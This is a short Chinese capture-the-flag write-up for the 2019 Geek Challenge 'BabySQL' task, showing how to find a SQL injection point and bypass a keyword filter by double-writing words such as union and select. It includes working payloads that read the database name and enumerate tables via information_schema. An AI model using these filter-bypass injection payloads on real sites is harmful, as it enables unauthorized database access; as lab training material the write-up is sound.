[极客大挑战 2019]BabySQL 1

Brucye2026-03-12 18:03

[极客大挑战 2019]BabySQL 1

文章目录

题目预览

基本测试

这里包数据包放到Burp的Repeater中继续进行

单引号测试报错,#号闭合回显,说明有SQL注入点

注意:这里面的空格用+号替换

查列数

回显发现过滤了or,by,回显中留下了der,判断是用replace替换过滤,后面用双写绕过

双写后继续测试

最后测试完是3列

测数据库

后续测试中过滤什么,就双写什么

sql 复制代码 
ununionion+seselectlect+1,2,database()%23

测试到数据库是geek

测数据表

sql 复制代码 
ununionion+seselectlect+1,2,group_concat(table_name)+frfromom+infoorrmation_schema.tables+whwhereere+table_schema='geek'%23

测数据字段

测字段值

完结~

相关推荐
想唱rap9 小时前
IO多路转接Select
运维·服务器·网络·数据库·sql·tcp/ip·mysql
其实防守也摸鱼9 小时前
upload-labs靶场的pass-13~21的解题步骤及原理讲解
python·安全·网络安全·靶场·二进制·文件上传漏洞·文件包含漏洞
Yushan Bai9 小时前
ORACLE SQL Performance Analyzer (SPA) 测试流程
数据库·sql
Lust Dusk10 小时前
2026年最新phpstorm安装下载教程(附带激活链接)
网络·ide·安全·网络安全·phpstorm
JavaEdge.10 小时前
07-LangChain Toolkit 实战:从工具函数到 Python Agent,再到 SQL Agent
python·sql·langchain
历程里程碑11 小时前
53 多路转接select
linux·开发语言·数据结构·数据库·c++·sql·排序算法
南棋网络安全11 小时前
liunx系统搭建pikachu
网络安全
不驚13 小时前
软考信息安全工程师-第七章《访问控制技术原理与应用》
计算机网络·网络安全·信息安全·软考·信息安全工程师
山川绿水19 小时前
bugku——PWN——overflow2
人工智能·web安全·网络安全
山峰哥20 小时前
SQL慢查询调优实战:从全表扫描到索引覆盖的完整复盘
前端·数据库·sql·性能优化
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比05Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07【AI】2026 年具身智能模型和世界模型总结08【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法09codex app每次打开重连5次Reconnecting问题解决10Codex 手机端连接教程:三分钟搞定,附完整步骤